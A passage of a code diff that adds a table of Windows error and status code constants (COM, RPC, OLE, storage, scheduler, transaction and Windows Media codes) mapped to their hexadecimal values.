+NS_S_WMP_LOADED_GIF_IMAGE = 0x000D1040
+NS_S_WMP_LOADED_PNG_IMAGE = 0x000D1041
+NS_S_WMP_LOADED_BMP_IMAGE = 0x000D1042
+NS_S_WMP_LOADED_JPG_IMAGE = 0x000D1043
+NS_S_WMG_FORCE_DROP_FRAME = 0x000D104F
+NS_S_WMR_ALREADYRENDERED = 0x000D105F
+NS_S_WMR_PINTYPEPARTIALMATCH = 0x000D1060
+NS_S_WMR_PINTYPEFULLMATCH = 0x000D1061
+NS_S_WMG_ADVISE_DROP_FRAME = 0x000D1066
+NS_S_WMG_ADVISE_DROP_TO_KEYFRAME = 0x000D1067
+NS_S_NEED_TO_BUY_BURN_RIGHTS = 0x000D10DB
+NS_S_WMPCORE_PLAYLISTCLEARABORT = 0x000D10FE
+NS_S_WMPCORE_PLAYLISTREMOVEITEMABORT = 0x000D10FF
+NS_S_WMPCORE_PLAYLIST_CREATION_PENDING = 0x000D1102
+NS_S_WMPCORE_MEDIA_VALIDATION_PENDING = 0x000D1103
+NS_S_WMPCORE_PLAYLIST_REPEAT_SECONDARY_SEGMENTS_IGNORED = 0x000D1104
+NS_S_WMPCORE_COMMAND_NOT_AVAILABLE = 0x000D1105
+NS_S_WMPCORE_PLAYLIST_NAME_AUTO_GENERATED = 0x000D1106
+NS_S_WMPCORE_PLAYLIST_IMPORT_MISSING_ITEMS = 0x000D1107
+NS_S_WMPCORE_PLAYLIST_COLLAPSED_TO_SINGLE_MEDIA = 0x000D1108
+NS_S_WMPCORE_MEDIA_CHILD_PLAYLIST_OPEN_PENDING = 0x000D1109
+NS_S_WMPCORE_MORE_NODES_AVAIABLE = 0x000D110A
+NS_S_WMPBR_SUCCESS = 0x000D1135
+NS_S_WMPBR_PARTIALSUCCESS = 0x000D1136
+NS_S_WMPEFFECT_TRANSPARENT = 0x000D1144
+NS_S_WMPEFFECT_OPAQUE = 0x000D1145
+NS_S_OPERATION_PENDING = 0x000D114E
+NS_S_TRACK_BUY_REQUIRES_ALBUM_PURCHASE = 0x000D1359
+NS_S_NAVIGATION_COMPLETE_WITH_ERRORS = 0x000D135E
+NS_S_TRACK_ALREADY_DOWNLOADED = 0x000D1361
+NS_S_PUBLISHING_POINT_STARTED_WITH_FAILED_SINKS = 0x000D1519
+NS_S_DRM_LICENSE_ACQUIRED = 0x000D2726
+NS_S_DRM_INDIVIDUALIZED = 0x000D2727
+NS_S_DRM_MONITOR_CANCELLED = 0x000D2746
+NS_S_DRM_ACQUIRE_CANCELLED = 0x000D2747
+NS_S_DRM_BURNABLE_TRACK = 0x000D276E
+NS_S_DRM_BURNABLE_TRACK_WITH_PLAYLIST_RESTRICTION = 0x000D276F
+NS_S_DRM_NEEDS_INDIVIDUALIZATION = 0x000D27DE
+NS_S_REBOOT_RECOMMENDED = 0x000D2AF8
+NS_S_REBOOT_REQUIRED = 0x000D2AF9
+NS_S_EOSRECEDING = 0x000D2F09
+NS_S_CHANGENOTICE = 0x000D2F0D
+ERROR_FLT_IO_COMPLETE = 0x001F0001
+ERROR_GRAPHICS_MODE_NOT_PINNED = 0x00262307
+ERROR_GRAPHICS_NO_PREFERRED_MODE = 0x0026231E
+ERROR_GRAPHICS_DATASET_IS_EMPTY = 0x0026234B
+ERROR_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET = 0x0026234C
+ERROR_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED = 0x00262351
+PLA_S_PROPERTY_IGNORED = 0x00300100
+ERROR_NDIS_INDICATION_REQUIRED = 0x00340001
+TRK_S_OUT_OF_SYNC = 0x0DEAD100
+TRK_VOLUME_NOT_FOUND = 0x0DEAD102
+TRK_VOLUME_NOT_OWNED = 0x0DEAD103
+TRK_S_NOTIFICATION_QUOTA_EXCEEDED = 0x0DEAD107
+NS_I_TIGER_START = 0x400D004F
+NS_I_CUB_START = 0x400D0051
+NS_I_CUB_RUNNING = 0x400D0052
+NS_I_DISK_START = 0x400D0054
+NS_I_DISK_REBUILD_STARTED = 0x400D0056
+NS_I_DISK_REBUILD_FINISHED = 0x400D0057
+NS_I_DISK_REBUILD_ABORTED = 0x400D0058
+NS_I_LIMIT_FUNNELS = 0x400D0059
+NS_I_START_DISK = 0x400D005A
+NS_I_STOP_DISK = 0x400D005B
+NS_I_STOP_CUB = 0x400D005C
+NS_I_KILL_USERSESSION = 0x400D005D
+NS_I_KILL_CONNECTION = 0x400D005E
+NS_I_REBUILD_DISK = 0x400D005F
+MCMADM_I_NO_EVENTS = 0x400D0069
+NS_I_LOGGING_FAILED = 0x400D006E
+NS_I_LIMIT_BANDWIDTH = 0x400D0070
+NS_I_CUB_UNFAIL_LINK = 0x400D0191
+NS_I_RESTRIPE_START = 0x400D0193
+NS_I_RESTRIPE_DONE = 0x400D0194
+NS_I_RESTRIPE_DISK_OUT = 0x400D0196
+NS_I_RESTRIPE_CUB_OUT = 0x400D0197
+NS_I_DISK_STOP = 0x400D0198
+NS_I_PLAYLIST_CHANGE_RECEDING = 0x400D14BE
+NS_I_RECONNECTED = 0x400D2EFF
+NS_I_NOLOG_STOP = 0x400D2F01
+NS_I_EXISTING_PACKETIZER = 0x400D2F03
+NS_I_MANUAL_PROXY = 0x400D2F04
+ERROR_GRAPHICS_DRIVER_MISMATCH = 0x40262009
+ERROR_GRAPHICS_UNKNOWN_CHILD_STATUS = 0x4026242F
+ERROR_GRAPHICS_LEADLINK_START_DEFERRED = 0x40262437
+ERROR_GRAPHICS_POLLING_TOO_FREQUENTLY = 0x40262439
+ERROR_GRAPHICS_START_DEFERRED = 0x4026243A
+E_PENDING = 0x8000000A
+E_NOTIMPL = 0x80004001
+E_NOINTERFACE = 0x80004002
+E_POINTER = 0x80004003
+E_ABORT = 0x80004004
+E_FAIL = 0x80004005
+CO_E_INIT_TLS = 0x80004006
+CO_E_INIT_SHARED_ALLOCATOR = 0x80004007
+CO_E_INIT_MEMORY_ALLOCATOR = 0x80004008
+CO_E_INIT_CLASS_CACHE = 0x80004009
+CO_E_INIT_RPC_CHANNEL = 0x8000400A
+CO_E_INIT_TLS_SET_CHANNEL_CONTROL = 0x8000400B
+CO_E_INIT_TLS_CHANNEL_CONTROL = 0x8000400C
+CO_E_INIT_UNACCEPTED_USER_ALLOCATOR = 0x8000400D
+CO_E_INIT_SCM_MUTEX_EXISTS = 0x8000400E
+CO_E_INIT_SCM_FILE_MAPPING_EXISTS = 0x8000400F
+CO_E_INIT_SCM_MAP_VIEW_OF_FILE = 0x80004010
+CO_E_INIT_SCM_EXEC_FAILURE = 0x80004011
+CO_E_INIT_ONLY_SINGLE_THREADED = 0x80004012
+CO_E_CANT_REMOTE = 0x80004013
+CO_E_BAD_SERVER_NAME = 0x80004014
+CO_E_WRONG_SERVER_IDENTITY = 0x80004015
+CO_E_OLE1DDE_DISABLED = 0x80004016
+CO_E_RUNAS_SYNTAX = 0x80004017
+CO_E_CREATEPROCESS_FAILURE = 0x80004018
+CO_E_RUNAS_CREATEPROCESS_FAILURE = 0x80004019
+CO_E_RUNAS_LOGON_FAILURE = 0x8000401A
+CO_E_LAUNCH_PERMSSION_DENIED = 0x8000401B
+CO_E_START_SERVICE_FAILURE = 0x8000401C
+CO_E_REMOTE_COMMUNICATION_FAILURE = 0x8000401D
+CO_E_SERVER_START_TIMEOUT = 0x8000401E
+CO_E_CLSREG_INCONSISTENT = 0x8000401F
+CO_E_IIDREG_INCONSISTENT = 0x80004020
+CO_E_NOT_SUPPORTED = 0x80004021
+CO_E_RELOAD_DLL = 0x80004022
+CO_E_MSI_ERROR = 0x80004023
+CO_E_ATTEMPT_TO_CREATE_OUTSIDE_CLIENT_CONTEXT = 0x80004024
+CO_E_SERVER_PAUSED = 0x80004025
+CO_E_SERVER_NOT_PAUSED = 0x80004026
+CO_E_CLASS_DISABLED = 0x80004027
+CO_E_CLRNOTAVAILABLE = 0x80004028
+CO_E_ASYNC_WORK_REJECTED = 0x80004029
+CO_E_SERVER_INIT_TIMEOUT = 0x8000402A
+CO_E_NO_SECCTX_IN_ACTIVATE = 0x8000402B
+CO_E_TRACKER_CONFIG = 0x80004030
+CO_E_THREADPOOL_CONFIG = 0x80004031
+CO_E_SXS_CONFIG = 0x80004032
+CO_E_MALFORMED_SPN = 0x80004033
+E_UNEXPECTED = 0x8000FFFF
+RPC_E_CALL_REJECTED = 0x80010001
+RPC_E_CALL_CANCELED = 0x80010002
+RPC_E_CANTPOST_INSENDCALL = 0x80010003
+RPC_E_CANTCALLOUT_INASYNCCALL = 0x80010004
+RPC_E_CANTCALLOUT_INEXTERNALCALL = 0x80010005
+RPC_E_CONNECTION_TERMINATED = 0x80010006
+RPC_E_SERVER_DIED = 0x80010007
+RPC_E_CLIENT_DIED = 0x80010008
+RPC_E_INVALID_DATAPACKET = 0x80010009
+RPC_E_CANTTRANSMIT_CALL = 0x8001000A
+RPC_E_CLIENT_CANTMARSHAL_DATA = 0x8001000B
+RPC_E_CLIENT_CANTUNMARSHAL_DATA = 0x8001000C
+RPC_E_SERVER_CANTMARSHAL_DATA = 0x8001000D
+RPC_E_SERVER_CANTUNMARSHAL_DATA = 0x8001000E
+RPC_E_INVALID_DATA = 0x8001000F
+RPC_E_INVALID_PARAMETER = 0x80010010
+RPC_E_CANTCALLOUT_AGAIN = 0x80010011
+RPC_E_SERVER_DIED_DNE = 0x80010012
+RPC_E_SYS_CALL_FAILED = 0x80010100
+RPC_E_OUT_OF_RESOURCES = 0x80010101
+RPC_E_ATTEMPTED_MULTITHREAD = 0x80010102
+RPC_E_NOT_REGISTERED = 0x80010103
+RPC_E_FAULT = 0x80010104
+RPC_E_SERVERFAULT = 0x80010105
+RPC_E_CHANGED_MODE = 0x80010106
+RPC_E_INVALIDMETHOD = 0x80010107
+RPC_E_DISCONNECTED = 0x80010108
+RPC_E_RETRY = 0x80010109
+RPC_E_SERVERCALL_RETRYLATER = 0x8001010A
+RPC_E_SERVERCALL_REJECTED = 0x8001010B
+RPC_E_INVALID_CALLDATA = 0x8001010C
+RPC_E_CANTCALLOUT_ININPUTSYNCCALL = 0x8001010D
+RPC_E_WRONG_THREAD = 0x8001010E
+RPC_E_THREAD_NOT_INIT = 0x8001010F
+RPC_E_VERSION_MISMATCH = 0x80010110
+RPC_E_INVALID_HEADER = 0x80010111
+RPC_E_INVALID_EXTENSION = 0x80010112
+RPC_E_INVALID_IPID = 0x80010113
+RPC_E_INVALID_OBJECT = 0x80010114
+RPC_S_CALLPENDING = 0x80010115
+RPC_S_WAITONTIMER = 0x80010116
+RPC_E_CALL_COMPLETE = 0x80010117
+RPC_E_UNSECURE_CALL = 0x80010118
+RPC_E_TOO_LATE = 0x80010119
+RPC_E_NO_GOOD_SECURITY_PACKAGES = 0x8001011A
+RPC_E_ACCESS_DENIED = 0x8001011B
+RPC_E_REMOTE_DISABLED = 0x8001011C
+RPC_E_INVALID_OBJREF = 0x8001011D
+RPC_E_NO_CONTEXT = 0x8001011E
+RPC_E_TIMEOUT = 0x8001011F
+RPC_E_NO_SYNC = 0x80010120
+RPC_E_FULLSIC_REQUIRED = 0x80010121
+RPC_E_INVALID_STD_NAME = 0x80010122
+CO_E_FAILEDTOIMPERSONATE = 0x80010123
+CO_E_FAILEDTOGETSECCTX = 0x80010124
+CO_E_FAILEDTOOPENTHREADTOKEN = 0x80010125
+CO_E_FAILEDTOGETTOKENINFO = 0x80010126
+CO_E_TRUSTEEDOESNTMATCHCLIENT = 0x80010127
+CO_E_FAILEDTOQUERYCLIENTBLANKET = 0x80010128
+CO_E_FAILEDTOSETDACL = 0x80010129
+CO_E_ACCESSCHECKFAILED = 0x8001012A
+CO_E_NETACCESSAPIFAILED = 0x8001012B
+CO_E_WRONGTRUSTEENAMESYNTAX = 0x8001012C
+CO_E_INVALIDSID = 0x8001012D
+CO_E_CONVERSIONFAILED = 0x8001012E
+CO_E_NOMATCHINGSIDFOUND = 0x8001012F
+CO_E_LOOKUPACCSIDFAILED = 0x80010130
+CO_E_NOMATCHINGNAMEFOUND = 0x80010131
+CO_E_LOOKUPACCNAMEFAILED = 0x80010132
+CO_E_SETSERLHNDLFAILED = 0x80010133
+CO_E_FAILEDTOGETWINDIR = 0x80010134
+CO_E_PATHTOOLONG = 0x80010135
+CO_E_FAILEDTOGENUUID = 0x80010136
+CO_E_FAILEDTOCREATEFILE = 0x80010137
+CO_E_FAILEDTOCLOSEHANDLE = 0x80010138
+CO_E_EXCEEDSYSACLLIMIT = 0x80010139
+CO_E_ACESINWRONGORDER = 0x8001013A
+CO_E_INCOMPATIBLESTREAMVERSION = 0x8001013B
+CO_E_FAILEDTOOPENPROCESSTOKEN = 0x8001013C
+CO_E_DECODEFAILED = 0x8001013D
+CO_E_ACNOTINITIALIZED = 0x8001013F
+CO_E_CANCEL_DISABLED = 0x80010140
+RPC_E_UNEXPECTED = 0x8001FFFF
+DISP_E_UNKNOWNINTERFACE = 0x80020001
+DISP_E_MEMBERNOTFOUND = 0x80020003
+DISP_E_PARAMNOTFOUND = 0x80020004
+DISP_E_TYPEMISMATCH = 0x80020005
+DISP_E_UNKNOWNNAME = 0x80020006
+DISP_E_NONAMEDARGS = 0x80020007
+DISP_E_BADVARTYPE = 0x80020008
+DISP_E_EXCEPTION = 0x80020009
+DISP_E_OVERFLOW = 0x8002000A
+DISP_E_BADINDEX = 0x8002000B
+DISP_E_UNKNOWNLCID = 0x8002000C
+DISP_E_ARRAYISLOCKED = 0x8002000D
+DISP_E_BADPARAMCOUNT = 0x8002000E
+DISP_E_PARAMNOTOPTIONAL = 0x8002000F
+DISP_E_BADCALLEE = 0x80020010
+DISP_E_NOTACOLLECTION = 0x80020011
+DISP_E_DIVBYZERO = 0x80020012
+DISP_E_BUFFERTOOSMALL = 0x80020013
+TYPE_E_BUFFERTOOSMALL = 0x80028016
+TYPE_E_FIELDNOTFOUND = 0x80028017
+TYPE_E_INVDATAREAD = 0x80028018
+TYPE_E_UNSUPFORMAT = 0x80028019
+TYPE_E_REGISTRYACCESS = 0x8002801C
+TYPE_E_LIBNOTREGISTERED = 0x8002801D
+TYPE_E_UNDEFINEDTYPE = 0x80028027
+TYPE_E_QUALIFIEDNAMEDISALLOWED = 0x80028028
+TYPE_E_INVALIDSTATE = 0x80028029
+TYPE_E_WRONGTYPEKIND = 0x8002802A
+TYPE_E_ELEMENTNOTFOUND = 0x8002802B
+TYPE_E_AMBIGUOUSNAME = 0x8002802C
+TYPE_E_NAMECONFLICT = 0x8002802D
+TYPE_E_UNKNOWNLCID = 0x8002802E
+TYPE_E_DLLFUNCTIONNOTFOUND = 0x8002802F
+TYPE_E_BADMODULEKIND = 0x800288BD
+TYPE_E_SIZETOOBIG = 0x800288C5
+TYPE_E_DUPLICATEID = 0x800288C6
+TYPE_E_INVALIDID = 0x800288CF
+TYPE_E_TYPEMISMATCH = 0x80028CA0
+TYPE_E_OUTOFBOUNDS = 0x80028CA1
+TYPE_E_IOERROR = 0x80028CA2
+TYPE_E_CANTCREATETMPFILE = 0x80028CA3
+TYPE_E_CANTLOADLIBRARY = 0x80029C4A
+TYPE_E_INCONSISTENTPROPFUNCS = 0x80029C83
+TYPE_E_CIRCULARTYPE = 0x80029C84
+STG_E_INVALIDFUNCTION = 0x80030001
+STG_E_FILENOTFOUND = 0x80030002
+STG_E_PATHNOTFOUND = 0x80030003
+STG_E_TOOMANYOPENFILES = 0x80030004
+STG_E_ACCESSDENIED = 0x80030005
+STG_E_INVALIDHANDLE = 0x80030006
+STG_E_INSUFFICIENTMEMORY = 0x80030008
+STG_E_INVALIDPOINTER = 0x80030009
+STG_E_NOMOREFILES = 0x80030012
+STG_E_DISKISWRITEPROTECTED = 0x80030013
+STG_E_SEEKERROR = 0x80030019
+STG_E_WRITEFAULT = 0x8003001D
+STG_E_READFAULT = 0x8003001E
+STG_E_SHAREVIOLATION = 0x80030020
+STG_E_LOCKVIOLATION = 0x80030021
+STG_E_FILEALREADYEXISTS = 0x80030050
+STG_E_INVALIDPARAMETER = 0x80030057
+STG_E_MEDIUMFULL = 0x80030070
+STG_E_PROPSETMISMATCHED = 0x800300F0
+STG_E_ABNORMALAPIEXIT = 0x800300FA
+STG_E_INVALIDHEADER = 0x800300FB
+STG_E_INVALIDNAME = 0x800300FC
+STG_E_UNKNOWN = 0x800300FD
+STG_E_UNIMPLEMENTEDFUNCTION = 0x800300FE
+STG_E_INVALIDFLAG = 0x800300FF
+STG_E_INUSE = 0x80030100
+STG_E_NOTCURRENT = 0x80030101
+STG_E_REVERTED = 0x80030102
+STG_E_CANTSAVE = 0x80030103
+STG_E_OLDFORMAT = 0x80030104
+STG_E_OLDDLL = 0x80030105
+STG_E_SHAREREQUIRED = 0x80030106
+STG_E_NOTFILEBASEDSTORAGE = 0x80030107
+STG_E_EXTANTMARSHALLINGS = 0x80030108
+STG_E_DOCFILECORRUPT = 0x80030109
+STG_E_BADBASEADDRESS = 0x80030110
+STG_E_DOCFILETOOLARGE = 0x80030111
+STG_E_NOTSIMPLEFORMAT = 0x80030112
+STG_E_INCOMPLETE = 0x80030201
+STG_E_TERMINATED = 0x80030202
+STG_E_STATUS_COPY_PROTECTION_FAILURE = 0x80030305
+STG_E_CSS_AUTHENTICATION_FAILURE = 0x80030306
+STG_E_CSS_KEY_NOT_PRESENT = 0x80030307
+STG_E_CSS_KEY_NOT_ESTABLISHED = 0x80030308
+STG_E_CSS_SCRAMBLED_SECTOR = 0x80030309
+STG_E_CSS_REGION_MISMATCH = 0x8003030A
+STG_E_RESETS_EXHAUSTED = 0x8003030B
+OLE_E_OLEVERB = 0x80040000
+OLE_E_ADVF = 0x80040001
+OLE_E_ENUM_NOMORE = 0x80040002
+OLE_E_ADVISENOTSUPPORTED = 0x80040003
+OLE_E_NOCONNECTION = 0x80040004
+OLE_E_NOTRUNNING = 0x80040005
+OLE_E_NOCACHE = 0x80040006
+OLE_E_BLANK = 0x80040007
+OLE_E_CLASSDIFF = 0x80040008
+OLE_E_CANT_GETMONIKER = 0x80040009
+OLE_E_CANT_BINDTOSOURCE = 0x8004000A
+OLE_E_STATIC = 0x8004000B
+OLE_E_PROMPTSAVECANCELLED = 0x8004000C
+OLE_E_INVALIDRECT = 0x8004000D
+OLE_E_WRONGCOMPOBJ = 0x8004000E
+OLE_E_INVALIDHWND = 0x8004000F
+OLE_E_NOT_INPLACEACTIVE = 0x80040010
+OLE_E_CANTCONVERT = 0x80040011
+OLE_E_NOSTORAGE = 0x80040012
+DV_E_FORMATETC = 0x80040064
+DV_E_DVTARGETDEVICE = 0x80040065
+DV_E_STGMEDIUM = 0x80040066
+DV_E_STATDATA = 0x80040067
+DV_E_LINDEX = 0x80040068
+DV_E_TYMED = 0x80040069
+DV_E_CLIPFORMAT = 0x8004006A
+DV_E_DVASPECT = 0x8004006B
+DV_E_DVTARGETDEVICE_SIZE = 0x8004006C
+DV_E_NOIVIEWOBJECT = 0x8004006D
+DRAGDROP_E_NOTREGISTERED = 0x80040100
+DRAGDROP_E_ALREADYREGISTERED = 0x80040101
+DRAGDROP_E_INVALIDHWND = 0x80040102
+CLASS_E_NOAGGREGATION = 0x80040110
+CLASS_E_CLASSNOTAVAILABLE = 0x80040111
+CLASS_E_NOTLICENSED = 0x80040112
+VIEW_E_DRAW = 0x80040140
+REGDB_E_READREGDB = 0x80040150
+REGDB_E_WRITEREGDB = 0x80040151
+REGDB_E_KEYMISSING = 0x80040152
+REGDB_E_INVALIDVALUE = 0x80040153
+REGDB_E_CLASSNOTREG = 0x80040154
+REGDB_E_IIDNOTREG = 0x80040155
+REGDB_E_BADTHREADINGMODEL = 0x80040156
+CAT_E_CATIDNOEXIST = 0x80040160
+CAT_E_NODESCRIPTION = 0x80040161
+CS_E_PACKAGE_NOTFOUND = 0x80040164
+CS_E_NOT_DELETABLE = 0x80040165
+CS_E_CLASS_NOTFOUND = 0x80040166
+CS_E_INVALID_VERSION = 0x80040167
+CS_E_NO_CLASSSTORE = 0x80040168
+CS_E_OBJECT_NOTFOUND = 0x80040169
+CS_E_OBJECT_ALREADY_EXISTS = 0x8004016A
+CS_E_INVALID_PATH = 0x8004016B
+CS_E_NETWORK_ERROR = 0x8004016C
+CS_E_ADMIN_LIMIT_EXCEEDED = 0x8004016D
+CS_E_SCHEMA_MISMATCH = 0x8004016E
+CS_E_INTERNAL_ERROR = 0x8004016F
+CACHE_E_NOCACHE_UPDATED = 0x80040170
+OLEOBJ_E_NOVERBS = 0x80040180
+OLEOBJ_E_INVALIDVERB = 0x80040181
+INPLACE_E_NOTUNDOABLE = 0x800401A0
+INPLACE_E_NOTOOLSPACE = 0x800401A1
+CONVERT10_E_OLESTREAM_GET = 0x800401C0
+CONVERT10_E_OLESTREAM_PUT = 0x800401C1
+CONVERT10_E_OLESTREAM_FMT = 0x800401C2
+CONVERT10_E_OLESTREAM_BITMAP_TO_DIB = 0x800401C3
+CONVERT10_E_STG_FMT = 0x800401C4
+CONVERT10_E_STG_NO_STD_STREAM = 0x800401C5
+CONVERT10_E_STG_DIB_TO_BITMAP = 0x800401C6
+CLIPBRD_E_CANT_OPEN = 0x800401D0
+CLIPBRD_E_CANT_EMPTY = 0x800401D1
+CLIPBRD_E_CANT_SET = 0x800401D2
+CLIPBRD_E_BAD_DATA = 0x800401D3
+CLIPBRD_E_CANT_CLOSE = 0x800401D4
+MK_E_CONNECTMANUALLY = 0x800401E0
+MK_E_EXCEEDEDDEADLINE = 0x800401E1
+MK_E_NEEDGENERIC = 0x800401E2
+MK_E_UNAVAILABLE = 0x800401E3
+MK_E_SYNTAX = 0x800401E4
+MK_E_NOOBJECT = 0x800401E5
+MK_E_INVALIDEXTENSION = 0x800401E6
+MK_E_INTERMEDIATEINTERFACENOTSUPPORTED = 0x800401E7
+MK_E_NOTBINDABLE = 0x800401E8
+MK_E_NOTBOUND = 0x800401E9
+MK_E_CANTOPENFILE = 0x800401EA
+MK_E_MUSTBOTHERUSER = 0x800401EB
+MK_E_NOINVERSE = 0x800401EC
+MK_E_NOSTORAGE = 0x800401ED
+MK_E_NOPREFIX = 0x800401EE
+MK_E_ENUMERATION_FAILED = 0x800401EF
+CO_E_NOTINITIALIZED = 0x800401F0
+CO_E_ALREADYINITIALIZED = 0x800401F1
+CO_E_CANTDETERMINECLASS = 0x800401F2
+CO_E_CLASSSTRING = 0x800401F3
+CO_E_IIDSTRING = 0x800401F4
+CO_E_APPNOTFOUND = 0x800401F5
+CO_E_APPSINGLEUSE = 0x800401F6
+CO_E_ERRORINAPP = 0x800401F7
+CO_E_DLLNOTFOUND = 0x800401F8
+CO_E_ERRORINDLL = 0x800401F9
+CO_E_WRONGOSFORAPP = 0x800401FA
+CO_E_OBJNOTREG = 0x800401FB
+CO_E_OBJISREG = 0x800401FC
+CO_E_OBJNOTCONNECTED = 0x800401FD
+CO_E_APPDIDNTREG = 0x800401FE
+CO_E_RELEASED = 0x800401FF
+EVENT_E_ALL_SUBSCRIBERS_FAILED = 0x80040201
+EVENT_E_QUERYSYNTAX = 0x80040203
+EVENT_E_QUERYFIELD = 0x80040204
+EVENT_E_INTERNALEXCEPTION = 0x80040205
+EVENT_E_INTERNALERROR = 0x80040206
+EVENT_E_INVALID_PER_USER_SID = 0x80040207
+EVENT_E_USER_EXCEPTION = 0x80040208
+EVENT_E_TOO_MANY_METHODS = 0x80040209
+EVENT_E_MISSING_EVENTCLASS = 0x8004020A
+EVENT_E_NOT_ALL_REMOVED = 0x8004020B
+EVENT_E_COMPLUS_NOT_INSTALLED = 0x8004020C
+EVENT_E_CANT_MODIFY_OR_DELETE_UNCONFIGURED_OBJECT = 0x8004020D
+EVENT_E_CANT_MODIFY_OR_DELETE_CONFIGURED_OBJECT = 0x8004020E
+EVENT_E_INVALID_EVENT_CLASS_PARTITION = 0x8004020F
+EVENT_E_PER_USER_SID_NOT_LOGGED_ON = 0x80040210
+SCHED_E_TRIGGER_NOT_FOUND = 0x80041309
+SCHED_E_TASK_NOT_READY = 0x8004130A
+SCHED_E_TASK_NOT_RUNNING = 0x8004130B
+SCHED_E_SERVICE_NOT_INSTALLED = 0x8004130C
+SCHED_E_CANNOT_OPEN_TASK = 0x8004130D
+SCHED_E_INVALID_TASK = 0x8004130E
+SCHED_E_ACCOUNT_INFORMATION_NOT_SET = 0x8004130F
+SCHED_E_ACCOUNT_NAME_NOT_FOUND = 0x80041310
+SCHED_E_ACCOUNT_DBASE_CORRUPT = 0x80041311
+SCHED_E_NO_SECURITY_SERVICES = 0x80041312
+SCHED_E_UNKNOWN_OBJECT_VERSION = 0x80041313
+SCHED_E_UNSUPPORTED_ACCOUNT_OPTION = 0x80041314
+SCHED_E_SERVICE_NOT_RUNNING = 0x80041315
+SCHED_E_UNEXPECTEDNODE = 0x80041316
+SCHED_E_NAMESPACE = 0x80041317
+SCHED_E_INVALIDVALUE = 0x80041318
+SCHED_E_MISSINGNODE = 0x80041319
+SCHED_E_MALFORMEDXML = 0x8004131A
+SCHED_E_TOO_MANY_NODES = 0x8004131D
+SCHED_E_PAST_END_BOUNDARY = 0x8004131E
+SCHED_E_ALREADY_RUNNING = 0x8004131F
+SCHED_E_USER_NOT_LOGGED_ON = 0x80041320
+SCHED_E_INVALID_TASK_HASH = 0x80041321
+SCHED_E_SERVICE_NOT_AVAILABLE = 0x80041322
+SCHED_E_SERVICE_TOO_BUSY = 0x80041323
+SCHED_E_TASK_ATTEMPTED = 0x80041324
+XACT_E_ALREADYOTHERSINGLEPHASE = 0x8004D000
+XACT_E_CANTRETAIN = 0x8004D001
+XACT_E_COMMITFAILED = 0x8004D002
+XACT_E_COMMITPREVENTED = 0x8004D003
+XACT_E_HEURISTICABORT = 0x8004D004
+XACT_E_HEURISTICCOMMIT = 0x8004D005
+XACT_E_HEURISTICDAMAGE = 0x8004D006
+XACT_E_HEURISTICDANGER = 0x8004D007
+XACT_E_ISOLATIONLEVEL = 0x8004D008
+XACT_E_NOASYNC = 0x8004D009
+XACT_E_NOENLIST = 0x8004D00A
+XACT_E_NOISORETAIN = 0x8004D00B
+XACT_E_NORESOURCE = 0x8004D00C
+XACT_E_NOTCURRENT = 0x8004D00D
+XACT_E_NOTRANSACTION = 0x8004D00E
+XACT_E_NOTSUPPORTED = 0x8004D00F
+XACT_E_UNKNOWNRMGRID = 0x8004D010
+XACT_E_WRONGSTATE = 0x8004D011
+XACT_E_WRONGUOW = 0x8004D012
+XACT_E_XTIONEXISTS = 0x8004D013
+XACT_E_NOIMPORTOBJECT = 0x8004D014
+XACT_E_INVALIDCOOKIE = 0x8004D015
+XACT_E_INDOUBT = 0x8004D016
+XACT_E_NOTIMEOUT = 0x8004D017
+XACT_E_ALREADYINPROGRESS = 0x8004D018
+XACT_E_ABORTED = 0x8004D019
+XACT_E_LOGFULL = 0x8004D01A
+XACT_E_TMNOTAVAILABLE = 0x8004D01B
+XACT_E_CONNECTION_DOWN = 0x8004D01C
+XACT_E_CONNECTION_DENIED = 0x8004D01D
+XACT_E_REENLISTTIMEOUT = 0x8004D01E
+XACT_E_TIP_CONNECT_FAILED = 0x8004D01F
+XACT_E_TIP_PROTOCOL_ERROR = 0x8004D020
+XACT_E_TIP_PULL_FAILED = 0x8004D021
+XACT_E_DEST_TMNOTAVAILABLE = 0x8004D022
+XACT_E_TIP_DISABLED = 0x8004D023
+XACT_E_NETWORK_TX_DISABLED = 0x8004D024
+XACT_E_PARTNER_NETWORK_TX_DISABLED = 0x8004D025
+XACT_E_XA_TX_DISABLED = 0x8004D026
+XACT_E_UNABLE_TO_READ_DTC_CONFIG = 0x8004D027
+XACT_E_UNABLE_TO_LOAD_DTC_PROXY = 0x8004D028
+XACT_E_ABORTING = 0x8004D029
+XACT_E_CLERKNOTFOUND = 0x8004D080
+XACT_E_CLERKEXISTS = 0x8004D081
+XACT_E_RECOVERYINPROGRESS = 0x8004D082
+XACT_E_TRANSACTIONCLOSED = 0x8004D083
+XACT_E_INVALIDLSN = 0x8004D084
+XACT_E_REPLAYREQUEST = 0x8004D085
+XACT_E_CONNECTION_REQUEST_DENIED = 0x8004D100
+XACT_E_TOOMANY_ENLISTMENTS = 0x8004D101
+XACT_E_DUPLICATE_GUID = 0x8004D102
+XACT_E_NOTSINGLEPHASE = 0x8004D103
+XACT_E_RECOVERYALREADYDONE = 0x8004D104
+XACT_E_PROTOCOL = 0x8004D105
+XACT_E_RM_FAILURE = 0x8004D106
+XACT_E_RECOVERY_FAILED = 0x8004D107
+XACT_E_LU_NOT_FOUND = 0x8004D108
+XACT_E_DUPLICATE_LU = 0x8004D109
+XACT_E_LU_NOT_CONNECTED = 0x8004D10A
+XACT_E_DUPLICATE_TRANSID = 0x8004D10B
+XACT_E_LU_BUSY = 0x8004D10C
+XACT_E_LU_NO_RECOVERY_PROCESS = 0x8004D10D
+XACT_E_LU_DOWN = 0x8004D10E
+XACT_E_LU_RECOVERING = 0x8004D10F
+XACT_E_LU_RECOVERY_MISMATCH = 0x8004D110
+XACT_E_RM_UNAVAILABLE = 0x8004D111
+CONTEXT_E_ABORTED = 0x8004E002
+CONTEXT_E_ABORTING = 0x8004E003
+CONTEXT_E_NOCONTEXT = 0x8004E004
+CONTEXT_E_WOULD_DEADLOCK = 0x8004E005
+CONTEXT_E_SYNCH_TIMEOUT = 0x8004E006
+CONTEXT_E_OLDREF = 0x8004E007
+CONTEXT_E_ROLENOTFOUND = 0x8004E00C
+CONTEXT_E_TMNOTAVAILABLE = 0x8004E00F
+CO_E_ACTIVATIONFAILED = 0x8004E021
+CO_E_ACTIVATIONFAILED_EVENTLOGGED = 0x8004E022
+CO_E_ACTIVATIONFAILED_CATALOGERROR = 0x8004E023
+CO_E_ACTIVATIONFAILED_TIMEOUT = 0x8004E024
